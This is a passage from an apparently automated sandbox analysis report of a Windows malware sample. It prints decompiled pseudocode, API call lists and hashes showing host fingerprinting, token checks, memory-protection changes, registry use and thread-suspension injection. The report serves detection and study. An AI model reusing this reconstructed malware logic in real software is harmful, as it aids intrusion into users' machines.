				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E027782D9( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0x277d230; // 0x27ba5a8
					_push(0x277d238);
					_push(1);
					_t7 = _t32 + 0x277e5bc; // 0x4d283a53
					 *0x277d234 = 0xc;
					 *0x277d23c = 0;
					L027773FE();
					_t36 = E027712E8(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E0277A12A(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E027775C4(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x277d230; // 0x27ba5a8
								_t18 = _t64 + 0x277e916; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x277d288 = _t87;
						}
						_t38 = E0277A667();
						 *0x277d228 =  *0x277d228 ^ 0xe8fa7dd7;
						 *0x277d278 = _t38;
						_t39 = E027775C4(0x60);
						__eflags = _t39;
						 *0x277d2dc = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x277d2dc; // 0x4f39630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x277d2dc; // 0x4f39630
							 *_t56 = 0x277e882;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x277d1f0, _t84, 0x52);
							__eflags = _t42;
							 *0x277d270 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x277d214; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x277d230; // 0x27ba5a8
								_t19 = _t76 + 0x277e212; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x277c2bf);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E0277A12A( ~_v8 &  *0x277d228, 0x277d00c); // executed
								_t84 = E027758CA(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E02777098(_t73); // executed
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E027737CA(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E02778BA5(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x277d130(); // executed
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E02773267(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x027777eb
0x027777f6
0x027777f9
0x027777fc
0x027777ff
0x02777806
0x02777808
0x02777814
0x02777816
0x02777816
0x0277781f
0x02777827
0x0277782a
0x02777844
0x02777849
0x0277784a
0x0277784c
0x02777851
0x02777856
0x02777858
0x0277785f
0x02777869
0x0277786f
0x0277787c
0x02777883
0x02777888
0x02777888
0x02777891
0x027778ba
0x027778bd
0x027778ca
0x027778d1
0x027778dd
0x027778df
0x027778e1
0x027778e6
0x027778ec
0x027778f2
0x027778f8
0x027778fb
0x02777900
0x02777908
0x0277790a
0x0277790a
0x0277790d
0x0277790d
0x02777913
0x02777918
0x02777920
0x02777925
0x0277792a
0x0277792c
0x02777931
0x02777960
0x02777933
0x02777938
0x0277793d
0x02777942
0x02777949
0x0277794f
0x02777954
0x0277795a
0x0277795a
0x02777961
0x02777963
0x02777972
0x02777978
0x0277797a
0x0277797f
0x027779ab
0x02777981
0x02777981
0x02777987
0x02777994
0x0277799a
0x0277799a
0x027779a2
0x027779a4
0x027779ac
0x027779ae
0x027779b5
0x027779c2
0x027779cc
0x027779ce
0x027779d0
0x00000000
0x00000000
0x027779d2
0x027779d7
0x027779d9
0x027779e0
0x027779e4
0x027779e7
0x027779fc
0x02777a00
0x02777a05
0x00000000
0x02777a05
0x027779e9
0x027779eb
0x00000000
0x00000000
0x027779ed
0x027779f6
0x027779f8
0x027779fa
0x00000000
0x00000000
0x00000000
0x027779fa
0x027779dd
0x027779dd
0x027779ae
0x02777893
0x02777893
0x02777898
0x02777a07
0x02777a0b
0x02777a13
0x02777a13
0x00000000
0x02777a0b
0x0277789e
0x027778a1
0x027778a1
0x027778a3
0x027778a6
0x027778ae
0x027778b5
0x00000000
0x02777a1b
0x02777a1b
0x02777a1e
0x02777a23
0x02777a23

APIs

Part of subcall function 02778B76: GetModuleHandleA.KERNEL32(4C44544E,00000000,02777804,00000000,00000000,00000000,?,?,?,?,?,027787DD,?,00000001), ref: 02778B85

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0277D238,00000000), ref: 0277786F
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,027787DD,?,00000001), ref: 02777888
wsprintfA.USER32 ref: 02777908
memset.NTDLL ref: 02777938
RtlInitializeCriticalSection.NTDLL(04F395F0), ref: 02777949
RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 02777972
wsprintfA.USER32 ref: 027779A2

Part of subcall function 0277A12A: GetUserNameW.ADVAPI32(00000000,027779C7), ref: 0277A161
Part of subcall function 0277A12A: RtlAllocateHeap.NTDLL(00000000,027779C7), ref: 0277A178
Part of subcall function 0277A12A: GetUserNameW.ADVAPI32(00000000,027779C7), ref: 0277A185
Part of subcall function 0277A12A: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,027779C7,?,?,?,?,?,027787DD,?,00000001), ref: 0277A1A6
Part of subcall function 0277A12A: GetComputerNameW.KERNEL32(00000000,00000000), ref: 0277A1CD
Part of subcall function 0277A12A: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0277A1E1
Part of subcall function 0277A12A: GetComputerNameW.KERNEL32(00000000,00000000), ref: 0277A1EE
Part of subcall function 0277A12A: HeapFree.KERNEL32(00000000,00000000), ref: 0277A20C

Part of subcall function 027775C4: RtlAllocateHeap.NTDLL(00000000,00000000,02775068), ref: 027775D0

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID:
API String ID: 2910951584-0
Opcode ID: 0d9d72ecc065cbd81a6330ad483e71af5bd75184cd76e0096695e8a6e3f71477
Instruction ID: d7483b0f382fd6ad8bac6c9e36d8e32d8de431385db9a295912513bbc8c0805a
Opcode Fuzzy Hash: 0d9d72ecc065cbd81a6330ad483e71af5bd75184cd76e0096695e8a6e3f71477
Instruction Fuzzy Hash: BB51F371D812159BEF26DBA8DC49B7FB7B9AF08710F118955E804E7240E770DA15CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0540600F, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0540882D: VirtualProtect.KERNELBASE(?,00000000,00000040,00000000,00000000,00000000,?,0542A578,0000001C,054016AB,?,00000000,00000000), ref: 05408852
Part of subcall function 0540882D: GetLastError.KERNEL32 ref: 0540885A
Part of subcall function 0540882D: VirtualQuery.KERNEL32(?,?,0000001C), ref: 05408871
Part of subcall function 0540882D: VirtualProtect.KERNEL32(?,?,-392CC87E,?), ref: 05408896

GetLastError.KERNEL32(00000000,00000004,?,00000000,00000001,00000000,00000000,0542A578,0000001C,054016AB,?,00000000,00000000), ref: 05406168

Part of subcall function 0540161E: lstrlen.KERNEL32(?), ref: 05401656
Part of subcall function 0540161E: lstrcpy.KERNEL32(00000000,?), ref: 0540166D
Part of subcall function 0540161E: StrChrA.SHLWAPI(00000000,0000002E), ref: 05401676
Part of subcall function 0540161E: GetModuleHandleA.KERNEL32(00000000), ref: 05401694

VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,?,?,00000000,00000001,00000000,00000000,0542A578,0000001C), ref: 054060E6
VirtualProtect.KERNELBASE(00000000,00000004,?,?,?,00000000,00000001,00000000,00000000,0542A578,0000001C,054016AB,?,00000000,00000000), ref: 05406101
RtlEnterCriticalSection.NTDLL(0542E260), ref: 05406125
RtlLeaveCriticalSection.NTDLL(0542E260), ref: 05406143

Part of subcall function 0540882D: SetLastError.KERNEL32(?), ref: 0540889F

Strings

, xrefs: 054060D5

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
String ID:
API String ID: 899430048-3916222277
Opcode ID: f79a63631890ef3029d5946e54dd45c5309a144209a8f601f02da01ce413b802
Instruction ID: 4b5a0625b41c234103a31f761c716f2b16e8c37abcf20be9cceac835a70eaa59
Opcode Fuzzy Hash: f79a63631890ef3029d5946e54dd45c5309a144209a8f601f02da01ce413b802
Instruction Fuzzy Hash: 08418271900629EFDB14DF55C948AEEBBF8FF08310F15816AE916AB291D770E950CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0542411E, Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 05415E21: GetProcAddress.KERNEL32(6F57775A,00000318), ref: 05415E46
Part of subcall function 05415E21: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 05415E62

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 05424157
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 05424242

Part of subcall function 05415E21: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 05415FCC

VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 0542418D
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05424199
lstrcmpi.KERNEL32(?,00000000), ref: 054241D6
StrChrA.SHLWAPI(?,0000002E), ref: 054241DF
lstrcmpi.KERNEL32(?,00000000), ref: 054241F1

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
String ID:
API String ID: 3901270786-0
Opcode ID: 029000176eb3f24935117096b3f36a4efb86d259ba78ebd2b6819f946d08fae4
Instruction ID: 404d5745cf8b98537a5d1c4d8d30b1a09a44028c68a2f604e6c7572f98ebdd62
Opcode Fuzzy Hash: 029000176eb3f24935117096b3f36a4efb86d259ba78ebd2b6819f946d08fae4
Instruction Fuzzy Hash: F4319171508331ABD735CF12D844BABBBE8FF88B44F41095AF88567280D770D905CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 05407E83, Relevance: 10.6, APIs: 7, Instructions: 80sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 0541DF0E: memset.NTDLL ref: 0541DF18

OpenEventA.KERNEL32(00000002,00000000,0542E140,?,00000000,00000000,?,0542137E), ref: 05407F13
SetEvent.KERNEL32(00000000,?,0542137E,?,?,?,?,?,?,?,?,0540202D,?), ref: 05407F20
Sleep.KERNEL32(00000BB8,?,0542137E,?,?,?,?,?,?,?,?,0540202D,?), ref: 05407F2B
ResetEvent.KERNEL32(00000000,?,0542137E,?,?,?,?,?,?,?,?,0540202D,?), ref: 05407F32
CloseHandle.KERNEL32(00000000,?,0542137E,?,?,?,?,?,?,?,?,0540202D,?), ref: 05407F39
GetShellWindow.USER32 ref: 05407F44
GetWindowThreadProcessId.USER32(00000000), ref: 05407F4B

Part of subcall function 0541BA6C: RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?,006E0049,System,004F0053,75144D40), ref: 0541BAC2
Part of subcall function 0541BA6C: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000004), ref: 0541BADE
Part of subcall function 0541BA6C: RegCloseKey.KERNELBASE(?), ref: 0541BAEF

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Event$CloseOpenWindow$HandleProcessQueryResetShellSleepThreadValuememset
String ID:
API String ID: 937394351-0
Opcode ID: d308b33cea452cd0942eda6f4d1b9e6df58e1060dca4df9293eca9e391aabdf0
Instruction ID: 8f05f97ecbcaa8f62c8714d06bab200b0091f5bd6b032ad1daf8c39ee8856a57
Opcode Fuzzy Hash: d308b33cea452cd0942eda6f4d1b9e6df58e1060dca4df9293eca9e391aabdf0
Instruction Fuzzy Hash: 4721C232614230BBC2286B679C8EDFF7F6DEB88650B54442AF50287380CF30A802C766

Uniqueness

Uniqueness Score: -1.00%

Function 02779FC0, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02779FC0(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x277d214 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E027775C4(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E02774C31(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x02779fcd
0x02779fd4
0x02779fdb
0x02779fef
0x02779ffa
0x0277a012
0x0277a01f
0x0277a022
0x0277a027
0x0277a032
0x0277a036
0x0277a045
0x0277a049
0x0277a065
0x0277a065
0x0277a069
0x0277a069
0x0277a06e
0x0277a072
0x0277a078
0x0277a079
0x0277a080
0x0277a086

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02779FF2
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 0277A012
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0277A022
CloseHandle.KERNEL32(00000000), ref: 0277A072

Part of subcall function 027775C4: RtlAllocateHeap.NTDLL(00000000,00000000,02775068), ref: 027775D0

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 0277A045
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 0277A04D
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 0277A05D

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 955c09925f56a6335dcfccc53f1c53a9e62c5126b0be838f770b4adb71563bd4
Instruction ID: 73bb979c18099b73a7a0d49f0203faea0168b7e75c46a3a91e3bd60130bec559
Opcode Fuzzy Hash: 955c09925f56a6335dcfccc53f1c53a9e62c5126b0be838f770b4adb71563bd4
Instruction Fuzzy Hash: B2213C75D40219FFEF119FA4DC84EEEBBB9EF48308F0044A5E910A6150D7718A55EF60

Uniqueness

Uniqueness Score: -1.00%

Function 02778714, Relevance: 10.6, APIs: 7, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E02778714(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x277d1f0 = _t14;
				if(_t14 != 0) {
					 *0x277d160 = GetTickCount();
					_t16 = E02777A5D(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L0277B03E();
						_t40 = _t18 + _t20;
						_t22 = E0277501B(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0x277d20c; // 0x2dc
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x277d218 = 1; // executed
						}
					}
					_t16 = E027777EB(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x02778714
0x02778729
0x02778731
0x02778736
0x02778749
0x0277874e
0x02778755
0x027787dd
0x027787e3
0x00000000
0x00000000
0x00000000
0x0277875b
0x0277875b
0x02778760
0x02778766
0x0277876c
0x02778776
0x0277877a
0x0277877b
0x02778780
0x02778781
0x02778782
0x02778787
0x0277878d
0x02778796
0x0277879c
0x027787a2
0x027787a7
0x027787ae
0x027787b2
0x027787ba
0x027787c2
0x027787c4
0x027787c4
0x027787cc
0x027787ce
0x027787ce
0x027787cc
0x027787d8
0x00000000
0x027787d8
0x0277873a
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 02778729
GetTickCount.KERNEL32 ref: 02778740
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 02778760
SwitchToThread.KERNEL32(?,00000001), ref: 02778766
_aullrem.NTDLL(?,?,00000009,00000000), ref: 02778782
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 0277879C
IsWow64Process.KERNEL32(000002DC,?,?,00000001), ref: 027787BA

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID:
API String ID: 3690864001-0
Opcode ID: 65c6b3b1fda5734f9cf4a4eb0b8bed096a5bd183f95a6009752ce30197ebe40f
Instruction ID: 96be096732b9d4b894b5756710cbfadcb4fc6d3762973b2363636d5baf27900c
Opcode Fuzzy Hash: 65c6b3b1fda5734f9cf4a4eb0b8bed096a5bd183f95a6009752ce30197ebe40f
Instruction Fuzzy Hash: 402163B2A402056FDB109FA4DC8DB6A77D8BB48254F408D2DF556D2140E7749818DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0541F3A6, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68registryCOMMON

Download Yara Rule

APIs

Part of subcall function 05406DF5: lstrlen.KERNEL32(?,00000000,0540B35A,00000027,0542E0E4,?,00000000,?,?,0540B35A,Local\,00000001,?,054177B2,?,00000000), ref: 05406E2B
Part of subcall function 05406DF5: lstrcpy.KERNEL32(00000000,00000000), ref: 05406E4F
Part of subcall function 05406DF5: lstrcat.KERNEL32(00000000,00000000), ref: 05406E57

RegOpenKeyExA.KERNELBASE(0541DF30,00000000,00000000,00020119,80000001,00000000,Software\AppDataLow\Software\Microsoft\,00000000,?,0542E140,0541DF30,0542137E,80000001,?,0542137E), ref: 0541F3DF
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,?,0542137E,?,?,?,?,?,?,?,?,0540202D), ref: 0541F3F3
RegCloseKey.KERNELBASE(?,?,Client32,?,?,?,0542137E,?,?,?,?,?,?,?,?,0540202D), ref: 0541F43C

Strings

Software\AppDataLow\Software\Microsoft\, xrefs: 0541F3B4
Client64, xrefs: 0541F425
Client32, xrefs: 0541F401

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Open$Closelstrcatlstrcpylstrlen
String ID: Client32$Client64$Software\AppDataLow\Software\Microsoft\
API String ID: 4131162436-710576342
Opcode ID: 8697a8f53aa51975371311ebd0e873f25a2eaccb08b36f2bc3ac48f4fcec13e9
Instruction ID: f96e5c8074a09e11add1b7728b217897fc9a3e6fd74350535001b00982d9b334
Opcode Fuzzy Hash: 8697a8f53aa51975371311ebd0e873f25a2eaccb08b36f2bc3ac48f4fcec13e9
Instruction Fuzzy Hash: 6511637594022DBFCB109FA5DD85CEFBBBDEE05254B50407BFD05A2110D6309E1AABA0

Uniqueness

Uniqueness Score: -1.00%

Function 0277492B, Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 0277496C
IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 027749EE
StrStrIW.SHLWAPI(00000000,006E0069), ref: 02774A2D
SysFreeString.OLEAUT32(00000000), ref: 02774A4F

Part of subcall function 027714BD: SysAllocString.OLEAUT32(0277C2C8), ref: 0277150D

SafeArrayDestroy.OLEAUT32(?), ref: 02774AA3
SysFreeString.OLEAUT32(?), ref: 02774AB1

Part of subcall function 027713AD: Sleep.KERNELBASE(000001F4), ref: 027713F5

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: 6850a2a03c14fe3e2d01f833ef8554d15cfb67e9a495a7f4eb48b03c6efbd578
Instruction ID: a27253361ec76e65a4d0882e5d186c388687c87bb1d9d8933d8ac39b76a8d6ca
Opcode Fuzzy Hash: 6850a2a03c14fe3e2d01f833ef8554d15cfb67e9a495a7f4eb48b03c6efbd578
Instruction Fuzzy Hash: B551447690020AEFCF11DFE8C8988AEB7BAFF88304B168869E515EB210D7719D45CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0541041A, Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0541043D

Part of subcall function 05406E6C: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,?,?,0540398A,00000000,00000000,00000000,0542E140,?,00000000,05407F62,0542E140), ref: 05406E87
Part of subcall function 05406E6C: IsWow64Process.KERNEL32(?,0542E140,?,00000000,?,?,0540398A,00000000,00000000,00000000,0542E140,?,00000000,05407F62,0542E140,00000000), ref: 05406E98
Part of subcall function 05406E6C: FindCloseChangeNotification.KERNELBASE(?,?,?,0540398A,00000000,00000000,00000000,0542E140,?,00000000,05407F62,0542E140,00000000,?,?,0542137E), ref: 05406EAB

ResumeThread.KERNEL32(0540202D,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,75144EE0,00000000), ref: 054104F7
WaitForSingleObject.KERNEL32(00000064), ref: 05410505
SuspendThread.KERNEL32(0540202D), ref: 05410518

Part of subcall function 05425868: memset.NTDLL ref: 05425B2A

ResumeThread.KERNELBASE(0540202D), ref: 0541059B

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Thread$ProcessResumememset$ChangeCloseFindNotificationObjectOpenSingleSuspendWaitWow64
String ID:
API String ID: 2336522172-0
Opcode ID: 0af387e7ffef0aa6893793319cc534b32a0dd39026e092b6e0f5fccaf11ae450
Instruction ID: a3460d6596bf0f39256c99ab81a4ffbaca6714749211cc58b4dad219d7a07b15
Opcode Fuzzy Hash: 0af387e7ffef0aa6893793319cc534b32a0dd39026e092b6e0f5fccaf11ae450
Instruction Fuzzy Hash: BD419D71A00219EFDB21DF55CC88AEE7BBAFB04340F54846AFD0A96250DB71DA918F19

Uniqueness

Uniqueness Score: -1.00%

Function 027783EC, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02774AC1: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,04F389D0,0277841C,?,?,?,?,?,?,?,?,?,?,?,0277841C), ref: 02774B8D

Part of subcall function 02777004: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 02777041
Part of subcall function 02777004: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 02777072

SysAllocString.OLEAUT32(?), ref: 02778448
SysAllocString.OLEAUT32(0070006F), ref: 0277845C
SysAllocString.OLEAUT32(00000000), ref: 0277846E
SysFreeString.OLEAUT32(00000000), ref: 027784D2
SysFreeString.OLEAUT32(00000000), ref: 027784E1
SysFreeString.OLEAUT32(00000000), ref: 027784EC

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
String ID:
API String ID: 2831207796-0
Opcode ID: 3ccd27baa9fb1ff35bbd2f721347377146f675ba0c6a8f3007c9e00e04c516e1
Instruction ID: 6dc38c1ee1e821de20db118a79d9a017d4318ab68be84dbdb1eb9d0353dc3ae1
Opcode Fuzzy Hash: 3ccd27baa9fb1ff35bbd2f721347377146f675ba0c6a8f3007c9e00e04c516e1
Instruction Fuzzy Hash: E0313232D00609AFDF01DFB8C848A9FB7BAAF49315F158469ED10FB110DB719905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05419A8E, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00000000,?,0542A588,00000018,0540D6E4,?,00000002,0542D518,?,0542D514,00000000), ref: 05419AD1
VirtualProtect.KERNELBASE(00000000,00000004,?,?,00000000,00000004,?,?,?,?,?,00000000,?,0542A588,00000018,0540D6E4), ref: 05419B5C
RtlEnterCriticalSection.NTDLL(0542E260), ref: 05419B84
RtlLeaveCriticalSection.NTDLL(0542E260), ref: 05419BA2

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
String ID:
API String ID: 3666628472-0
Opcode ID: 0dc1be84b7da73da08d9aa9c31ac6da59c30afa3b331f118fcf93800b16cbb4a
Instruction ID: 2c85d664662ad50c0514ffce45254b6e697c1a40472c100e32e704ef8e974874
Opcode Fuzzy Hash: 0dc1be84b7da73da08d9aa9c31ac6da59c30afa3b331f118fcf93800b16cbb4a
Instruction Fuzzy Hash: C941AC70A00215EFCB14DFA6C9989EEBBF9FF48340B10856BE912D7250D7709A41CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 027740AF, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E027740AF(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
